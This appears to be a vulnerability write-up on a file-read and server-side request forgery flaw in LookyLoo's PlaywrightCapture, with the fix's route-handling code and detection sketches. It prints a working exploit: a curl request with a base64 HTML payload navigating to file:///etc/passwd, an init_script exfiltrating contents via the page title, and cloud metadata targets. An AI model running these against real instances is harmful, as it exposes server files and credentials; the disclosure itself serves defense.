Two Input Paths, One Security Check: File Read in LookyLoo's PlaywrightCapture

LookyLoo is a web page capture and analysis tool maintained by CIRCL, the Luxembourg CERT. Security teams and CERTs use it to archive and inspect suspicious web pages: phishing sites, malware distribution pages, scam infrastructure. Under the hood, it uses PlaywrightCapture to drive a headless Chromium browser.

While reviewing the capture functionality, I found that one of the submission parameters completely bypassed the only_global_lookups security setting, allowing unauthenticated arbitrary file reads from the server filesystem.

Two ways to submit a capture

LookyLoo's /submit endpoint accepts two input modes:

url: a remote URL to capture. The browser navigates to it, and only_global_lookups restricts the capture to destinations with public (globally routable) IP addresses.
document: base64-encoded HTML content. LacusCore writes this to a temporary file and opens it as a file:// URL in the browser.

The only_global_lookups check only applied to the url code path. When document was provided, the code took a different branch and the security check was never evaluated.
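The structural flaw fits in a few lines. The Python below is a hypothetical simplification, not LacusCore's code. `host_is_global` and `start_capture` are illustrative names, the policy only understands IP literals (it does no DNS resolution), and the returned file path is a placeholder. The point is that the policy check sits inside one branch instead of guarding everything the browser ends up loading.

```python
import base64
import ipaddress
from typing import Optional
from urllib.parse import urlsplit


def host_is_global(url: str) -> bool:
    """Hypothetical stand-in for only_global_lookups: True only for http(s)
    URLs whose host is a globally routable IP literal (no DNS resolution)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        return ipaddress.ip_address(parts.hostname).is_global
    except ValueError:
        return False  # a hostname, not an IP literal; a real check would resolve it


def start_capture(url: Optional[str] = None, document: Optional[str] = None) -> str:
    """Return the first URL the browser would load (illustrative only)."""
    if url is not None:
        # The url branch consults the policy...
        if not host_is_global(url):
            raise PermissionError(f"blocked non-global target: {url}")
        return url
    if document is not None:
        # ...but the document branch never does. Decoding stands in for
        # writing the HTML to disk; the path below is a placeholder.
        base64.b64decode(document, validate=True)
        return "file:///tmp/capture/document.html"
    raise ValueError("either url or document is required")
```

With these definitions, `start_capture(url="http://127.0.0.1/")` raises `PermissionError`, while any base64 document is accepted and becomes a `file://` starting point, whatever its scripts do next.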

What this means in practice

When a capture is submitted with document, LacusCore decodes the base64 HTML, writes it to disk, and passes the resulting file:///tmp/.../document.html path to Playwright's page.goto(). The headless browser now operates from a file:// origin.
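The document path described above can be sketched with the standard library. This is an illustration under assumptions rather than LacusCore's implementation: the function name `document_to_file_url` and the use of a fresh `tempfile.mkdtemp()` directory are hypothetical choices.

```python
import base64
import tempfile
from pathlib import Path


def document_to_file_url(document_b64: str, document_name: str = "document.html") -> str:
    """Hypothetical sketch of the document path: decode the base64 HTML,
    write it into a new temporary directory, return its file:// URL."""
    html = base64.b64decode(document_b64, validate=True)
    tmp_dir = Path(tempfile.mkdtemp())
    # Keep only the final path component so a crafted name cannot escape tmp_dir.
    target = tmp_dir / Path(document_name).name
    target.write_bytes(html)
    # as_uri() needs an absolute path; resolve() guarantees one.
    return target.resolve().as_uri()
```

Whatever `<script>` the decoded HTML contains then runs with a `file://` origin once the browser is pointed at the returned URL.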

JavaScript within the document can navigate the browser to any other local file:

<script>window.location.href = "file:///etc/passwd";</script>

This works for three reasons: the navigation goes from one file:// URL to another (same scheme), the browser context is created with bypass_csp=True (so Content Security Policy is not enforced), and no Playwright route handlers were registered to intercept secondary navigations. The file contents render in the browser and end up in every output artifact: screenshots, saved HTML, and the HAR file.

The attack

The /submit endpoint requires no authentication on most deployments. A single request is sufficient:

curl -s -X POST "https://INSTANCE/submit" \
  -H "Content-Type: application/json" \
  -d '{
    "document": "'$(echo '<html><body><script>
      window.location.href="file:///etc/passwd";
    </script></body></html>' | base64 -w0)'",
    "document_name": "test.html",
    "init_script": "setTimeout(function(){ document.title = document.body.innerText.substring(0, 500); }, 1500);"
  }'

The init_script parameter (also accepted without authentication) injects JavaScript that, 1.5 seconds after load, copies the first 500 characters of the rendered page into the page title. The file contents can then be read from the capture's title without even downloading the full capture archive.

After the capture completes (about 30 seconds), the results can be retrieved:

curl -s "https://INSTANCE/tree/<uuid>/export" -o capture.zip

The HAR file inside the archive contains the full response body of the file:// request.
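For operators, the same artifacts can be used defensively: scanning the HAR files of past captures for requests to local files or internal addresses is one way to check whether an instance was abused. A minimal sketch, assuming the standard HAR 1.2 layout (`log.entries[].request.url`). `suspicious_har_urls` is a hypothetical helper, and since it does not resolve hostnames it only catches `file:` URLs, `localhost`, and non-global IP literals.

```python
import ipaddress
from typing import List
from urllib.parse import urlsplit


def suspicious_har_urls(har: dict) -> List[str]:
    """Return request URLs in a parsed HAR log that point at local files,
    localhost, or non-global IP literals (hostnames are not resolved)."""
    flagged = []
    for entry in har.get("log", {}).get("entries", []):
        url = entry.get("request", {}).get("url", "")
        parts = urlsplit(url)
        if parts.scheme == "file":
            flagged.append(url)
            continue
        host = parts.hostname or ""  # urlsplit strips the [] around IPv6 hosts
        if host == "localhost" or host.endswith(".localhost"):
            flagged.append(url)
            continue
        try:
            if not ipaddress.ip_address(host).is_global:
                flagged.append(url)
        except ValueError:
            pass  # an ordinary hostname; resolving it is out of scope here
    return flagged
```

Apply it to the parsed JSON (`json.load`) of each HAR file in an exported capture; a non-empty result deserves a closer look.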

Beyond local files

The same technique works for internal network resources. Instead of file://, the injected JavaScript can target cloud instance metadata endpoints (http://169.254.169.254/latest/meta-data/), internal web services, or loopback services. These requests are made by the headless browser on the server, making this a server-side request forgery with full response capture.

The fix

The primary fix was committed in 49e289e by the CIRCL team, with follow-up hardening in subsequent commits.

The fix adds Playwright route handlers that intercept every request the browser makes: the URL being captured is let through, and everything else is checked. The approach is similar to Puppeteer's page.setRequestInterception(), but uses Playwright's route API:

async def catch_file_route(route: Route, request: Request) -> None:
    if unquote(request.url) == url:
        await route.continue_()   # the URL being captured, allow it
    else:
        self.logger.warning(f"Attempt to open a local file: {request.url}")
        await route.fulfill(status=404, content_type="text/plain",
                          body=f"Attempted to open {request.url}, blocked.")

async def catch_local_route(route: Route, request: Request) -> None:
    if request.url == url:
        await route.continue_()
    else:
        _url = Url(request.url)
        try:
            ip = ipaddress.ip_address(_url.host.try_into_ip())
            if ip.is_global:
                return await route.continue_()
            return await route.fulfill(status=404, ...)
        except ValueError:
            pass
        hostname = _url.host.try_into_hostname()
        if str(hostname) == 'localhost':
            return await route.fulfill(status=404, ...)
        if hostname.suffix and str(hostname.suffix) == 'local':
            return await route.fulfill(status=404, ...)
        return await route.continue_()
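Because these handlers boil down to plain predicates, their rules can be restated and unit-tested without a browser. The sketch below is not the upstream code. It merges both handlers into one hypothetical `should_block(request_url, capture_url)` function, swaps the `Url` parser for `urllib.parse.urlsplit`, approximates the `.local` suffix check with `str.endswith`, and, like the original, does not resolve hostnames.

```python
import ipaddress
from urllib.parse import unquote, urlsplit


def should_block(request_url: str, capture_url: str) -> bool:
    """Hypothetical, stdlib-only restatement of catch_file_route and
    catch_local_route: True means the request would get a 404."""
    if request_url == capture_url or unquote(request_url) == capture_url:
        return False  # the page being captured is always allowed
    parts = urlsplit(request_url)
    if parts.scheme == "file":
        return True  # any other local file is blocked
    host = parts.hostname or ""
    try:
        # IP literal: allow only globally routable addresses.
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        pass  # not an IP literal, fall through to the hostname checks
    if host == "localhost" or host.endswith(".local"):
        return True
    return False  # other hostnames are allowed (no DNS resolution here)
```

Keeping the policy in a pure function makes it easy to call from each `page.route()` handler and to test edge cases separately from Playwright.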

The routes are registered when only_global_lookup is enabled (the default):

if self.only_global_lookup:
    await page.route("**/*", handler=catch_local_route)
    await page.route("file:**/*", handler=catch_file_route)
    await page.route("blob:**/*", lambda route: route.continue_())
    await page.route("filesystem:**/*", lambda route: route.continue_())
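Playwright documents that when several routes match a request, they run in the opposite order of registration, so the last registered route is tried first. The toy model below shows why the order of the calls above matters. It is a simplification: `first_matching_route` is a hypothetical helper, and `fnmatch` stands in for Playwright's own glob matching, whose syntax differs in details.

```python
from fnmatch import fnmatchcase
from typing import List, Tuple


def first_matching_route(url: str, routes: List[Tuple[str, str]]) -> str:
    """Return the name of the handler that would see `url` first.

    Simplified model: routes are tried in reverse registration order, and
    fnmatch approximates Playwright's glob patterns.
    """
    for pattern, handler_name in reversed(routes):
        if fnmatchcase(url, pattern):
            return handler_name
    return "no route (request proceeds untouched)"


# Registration order as in the page.route() calls shown in the article.
ROUTES = [
    ("**/*", "catch_local_route"),
    ("file:**/*", "catch_file_route"),
    ("blob:**/*", "allow"),
    ("filesystem:**/*", "allow"),
]
```

In this model, registering the catch-all first means `file:` URLs reach `catch_file_route`; had `**/*` been registered last, it would be tried first for every request, including `file:` URLs.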

Non-global IPs are identified with the is_global property of Python's ipaddress address objects, which is False for loopback, private, and link-local ranges, among others. Browser-internal schemes such as blob: and filesystem: URLs are explicitly allowed, since they don't access real OS resources. Follow-up commits (17182e0, 187a39f) addressed additional edge cases: chrome-extension:// URLs, localhost as a hostname, and correct route registration order (Playwright tries matching routes in reverse registration order, so the last one registered runs first).
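A quick standard-library check shows what `is_global` rejects. The sample addresses are illustrative, chosen to match the targets discussed earlier (loopback, private ranges, the 169.254.169.254 metadata address). The exact set of special-purpose ranges behind `is_private` and `is_global` has been refined across Python releases, so a deployment relying on it inherits the behavior of its interpreter version.

```python
import ipaddress

# Addresses a page might try to reach from inside the capture browser,
# plus one public resolver for contrast.
SAMPLES = {
    "127.0.0.1": "loopback",
    "10.0.0.5": "private (RFC 1918)",
    "192.168.1.1": "private (RFC 1918)",
    "169.254.169.254": "link-local (cloud metadata)",
    "::1": "IPv6 loopback",
    "fd00::1": "IPv6 unique local",
    "8.8.8.8": "public",
}

for addr, label in SAMPLES.items():
    ip = ipaddress.ip_address(addr)
    print(f"{addr:<16} {label:<28} is_global={ip.is_global}")
```

Only the public resolver passes; every internal target in the list is rejected.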

What makes this interesting

The only_global_lookups control was built specifically to prevent this class of attack. It existed, it was enabled by default, and it worked correctly on the url path. But the document parameter, which by design opens content from a file:// origin, took a completely separate code path that bypassed it entirely.

This is a pattern worth looking for in any application with multiple input paths that converge on the same sensitive operation. If there are two ways to trigger a capture, both need the same restrictions. Security controls applied to one input mode but not to a functionally equivalent alternative are easy to miss during code review, because the protection appears to be in place.

For anyone building browser-based capture or rendering tools: the initial URL is just the starting point. JavaScript running within the rendered page can trigger navigations, fetch requests, and resource loads to arbitrary destinations. Request-level interception (Playwright's page.route(), Puppeteer's page.setRequestInterception()) applied to all secondary requests is not optional.